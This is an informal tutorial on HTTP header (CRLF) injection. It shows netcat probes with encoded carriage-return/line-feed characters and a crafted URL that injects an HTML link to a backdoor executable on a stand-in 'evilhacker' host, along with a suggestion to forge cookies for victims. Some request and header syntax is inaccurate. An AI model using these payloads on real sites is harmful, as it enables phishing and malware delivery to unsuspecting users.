HTTP header injection

If we can inject newline into the header we control , then we will be able to insert some additional HTTP Header and some nasty body text. I don't think so that we can compromised a website/server via this vulnerability. But still it is power for Social Engineering attack, Phishing, Redirecting to malicious site, downloading backdoor, virtual defacement, sometime injecting cookie  etc. It is much like XSS.






Basically this vulnerability found in "set-cookie" and "location"  . If we connect to a website:

nc -vv target.com 80

GET /something.php?id=1&pay=40000&method=credit HTTP/1.1

After this get request we get like(Try to find it):

set-cookie=PaymentMethod=credit


If this is behavior of the host then we should try to insert Carriage-return and Line-feed :

nc -vv target.com 80  

GET /something.php?id=1&pay=40000&method=credit%0d%0a it-is=vulnerable HTTP/1.1

If the host is vulnerable then it will reply with a additional line "it-is=vulnerable" like this:

set-cookie=PaymentMethod=credi

it-is=vulnerable 


Simply a hacker can force the users to download a backdoor:

http://target.com/something.php?id=1&pay=40000&method=credit%0d%0a
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1



We can also create fake Cookie and send the url to the poor victim . Just think smartly and you will find some other way ;)


Be aware!!!